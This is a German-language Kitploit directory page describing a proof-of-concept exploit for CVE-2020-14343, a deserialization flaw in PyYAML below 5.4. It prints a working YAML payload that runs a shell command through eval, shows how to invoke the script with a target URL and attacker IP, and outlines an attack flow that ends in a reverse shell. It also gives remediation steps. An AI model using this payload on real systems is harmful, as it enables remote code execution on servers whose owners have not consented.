Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-14343-PyYAML — CVE-2020-14343的payload | Kitploit
Tools/GitHubGitHub/kairo-one/cve-2020-14343-pyyaml
Payload-GenerierungSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubkairo-one/cve-2020-14343-pyyaml

CVE-2020-14343-PyYAML

CVE-2020-14343的payload

Repository anzeigen
2vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-14343 PyYAML Deserialisierungs-Schwachstelle POC

Schwachstellenübersicht

Tool herunterladen
ElementInformation
CVE-NummerCVE-2020-14343
Betroffene KomponentePyYAML < 5.4
SchwachstellentypDeserialisierungs-Remote-Code-Ausführung (RCE)
GefahrenstufeHoch

Schwachstellenprinzip

PyYAML schränkt beim Parsen von nicht vertrauenswürdigen Daten mit yaml.load() keine gefährlichen YAML-Tags (wie !!python/object) ein. Ein Angreifer kann bösartigen YAML-Inhalt konstruieren, um beliebigen Python-Code auszuführen.

Payload-Kern:

root@kitploit:~
!!python/object/new:tuple
  - !!python/object/new:map
    - !!python/name:eval
    - ["__import__('os').system('command')"]

Verwendung

root@kitploit:~
python poc.py <Ziel-URL> <Angreifer-IP> <Lauschport>

Beispiel:

root@kitploit:~
python poc.py http://verwundbare-site.com 192.168.1.100 4444

Angriffsablauf

  1. Das Skript startet einen TCP-Listener lokal
  2. Es lädt eine bösartige YAML-Datei auf die /upload-Schnittstelle des Ziels hoch
  3. Es löst das Laden und Parsen der YAML über die /login-Schnittstelle aus
  4. Der Zielserver führt die Payload aus und sendet eine Reverse-Shell an den Angreifer

Abhängigkeiten installieren

root@kitploit:~
pip install requests

Haftungsausschluss

⚠️ Dieses Tool ist ausschließlich für Sicherheitsforschung und autorisierte Tests bestimmt!

  • Nicht für illegale Zwecke verwenden
  • Vor der Verwendung sicherstellen, dass eine Autorisierung für das Zielsystem vorliegt
  • Der Autor übernimmt keine Haftung für Missbrauch

Behebungsvorschläge

  1. Verwenden Sie yaml.safe_load() anstelle von yaml.load()
  2. Aktualisieren Sie PyYAML auf Version 5.4 oder höher
  3. Führen Sie eine strenge Validierung von Benutzereingaben durch

Referenzlinks

  • CVE-2020-14343 - NVD
  • PyYAML Offizielle Dokumentation